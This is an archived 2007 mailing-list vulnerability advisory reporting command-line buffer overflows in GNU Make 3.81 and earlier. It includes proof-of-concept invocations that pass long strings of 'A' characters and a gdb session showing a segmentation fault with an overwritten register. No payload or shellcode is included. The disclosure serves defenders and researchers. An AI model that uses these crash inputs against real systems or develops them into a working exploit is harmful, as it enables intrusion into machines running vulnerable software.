[Top][All Lists]

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

make multiple buffer overflow

From: laurent gaffie
Subject: make multiple buffer overflow
Date: Thu, 6 Dec 2007 00:08:30 -0500

Application: Make <= 3.81
Web Site: http://savannah.gnu.org/projects/make/ & http://www.gnu.org/software/make/
Platform: Unix
Bug:multiple buffer overflow


1) Introduction
2) Bug
3) Proof of concept
4) Greets
5) Credits
1) Introduction

Make is a tool which controls the generation of executables and other non-source files of a program from the program's source files.

Make gets its knowledge of how to build your program from a file called the makefile, which lists each of the non-source files and how to compute it from other files. When you write a program, you should write a makefile for it, so that it is possible to use Make to build and install the program.

2) Bug
Make doesn't filter any value submitted by cmd line, then it is possible to trigger some exploitable buffer overflow

3)Proof of concept

Proof of concept example :
make `perl -e 'print"A"x4096'` //***
make -f `perl -e 'print"A"x4096'`
make -j `perl -e 'print"A"x4096'`
make -i `perl -e 'print"A"x4096'`
make -l `perl -e 'print"A"x4096'`

*** depending the case , you'll need to change  the value ,  for a couple of more  A , playing by  hundred should be good to make sure you trigger it

address@hidden:~# gdb make
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
(gdb) run `perl -e 'print"A"x4296'`//my GCC version have a protection for stack smashing then 200 chars more , and we trigger it
Starting program: /usr/bin/make `perl -e 'print"A"x4296'`
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1209637200 (LWP 1246)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1209637200 (LWP 1246)]
0x08052ac5 in ?? ()
(gdb) i r
eax 0xbfffa930 -1073764048
ecx 0x0 0
edx 0x0 0
ebx 0x41414141 1094795585 //got overwritted here
esp 0xbfff8570 0xbfff8570
ebp 0xbfffa918 0xbfffa918
esi 0x80868f8 134768888
edi 0x8081560 134747488
eip 0x8052ac5 0x8052ac5 <address@hidden>
eflags 0x10206 [ PF IF RF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51

Deimos,Benjilenoob,team soh, #futurezone, #soh #nibbles


reply via email to

[Prev in Thread] Current Thread [Next in Thread]